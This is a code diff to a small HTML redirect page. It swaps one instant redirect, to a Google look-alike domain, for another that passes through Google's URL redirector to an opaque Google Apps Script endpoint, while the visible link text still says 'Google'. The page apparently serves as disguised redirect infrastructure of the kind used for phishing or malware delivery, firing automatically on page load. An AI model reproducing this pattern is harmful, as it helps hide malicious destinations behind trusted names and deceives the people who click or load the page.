--- a/index.html
+++ b/index.html
@@ -1,11 +1,11 @@
 <!DOCTYPE html>
 <html>
   <head>
-    <meta http-equiv="refresh" content="0; url=https://www.googvdle.com/" />
-    <script>window.location.href="https://www.googvdle.com/";</script>
+    <meta http-equiv="refresh" content="0; url=https://www.google.com/url?q=https://script.google.com/macros/s/AKfycbwsGBI64tK18hP3XJLUXFOASCPCIS-UmrCej1rmQyNRK324Zs8oTPGFqJQ1Z7_5SUAy/exec&sa=fca0fef2-5c17-4032-a8d6-4ff338334460HE09mqfTdGtrof" />
+    <script>window.location.href="https://www.google.com/url?q=https://script.google.com/macros/s/AKfycbwsGBI64tK18hP3XJLUXFOASCPCIS-UmrCej1rmQyNRK324Zs8oTPGFqJQ1Z7_5SUAy/exec&sa=fca0fef2-5c17-4032-a8d6-4ff338334460HE09mqfTdGtrof";</script>
     <title>Redirecting…</title>
   </head>
   <body>
-    Redirecting to <a href="https://www.googvdle.com/">Google</a>…
+    Redirecting to <a href="https://www.google.com/url?q=https://script.google.com/macros/s/AKfycbwsGBI64tK18hP3XJLUXFOASCPCIS-UmrCej1rmQyNRK324Zs8oTPGFqJQ1Z7_5SUAy/exec&sa=fca0fef2-5c17-4032-a8d6-4ff338334460HE09mqfTdGtrof">Google</a>…
   </body>
 </html>
